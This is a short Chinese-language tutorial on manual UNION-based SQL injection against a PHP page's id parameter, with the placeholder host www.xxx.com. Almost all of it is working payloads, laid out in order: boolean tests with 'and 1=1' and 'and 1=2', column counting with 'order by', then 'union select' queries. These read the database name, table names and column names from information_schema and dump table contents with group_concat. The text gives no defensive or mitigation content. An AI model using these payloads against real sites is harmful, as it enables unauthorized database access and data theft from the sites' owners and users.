准备知识
sql的增删改查命令(其中and & or(运算符)、order by(排序)、union(合并语句操作符)是重点)
-
判断是否存在漏洞
用and 1=1和and 1=2来验证判断,如:
http://www.xxx.com/sqli/01.PHP?id=1 and 1=1
返回数据,说明执行成功
http://www.xxx.com/sqli/01.PHP?id=1 and 1=2
不返回数据,说明数据库后台报错了 -
用排序间接查找出所有列(专业说法sql中叫字段)
用order by 来根据字段所在列排序间接查找出有多少个字段(列),如:
http://www.xxx.com/sqli/01.PHP?id=1 order by 3 -
用合并语句查询,并把自定义数字/字符来占位显示,需让自带表达式报错才能显示出自定义数字/字符,如:
http://www.xxx.com/1.PHP?id=1 and 1=2 union select 1,2,3 -
找出当前表的数据库名,如:
http://www.xxx.com/1.PHP?id=1 and 1=2 union select 1,database(),3 -
合并查询查出的数据库的所有表名,如:
http://www.xxx.com/1.PHP?id=1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() -
继续合并查询出当前表的所有字段(列名)如:
http://www.xxx.com/1.PHP?id=1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘news’ -
查询出字段下的数据,如:
http://www.xxx.com/1.PHP?id=1 and 1=2 union select 1,group_concat(id,title,content),3 from news
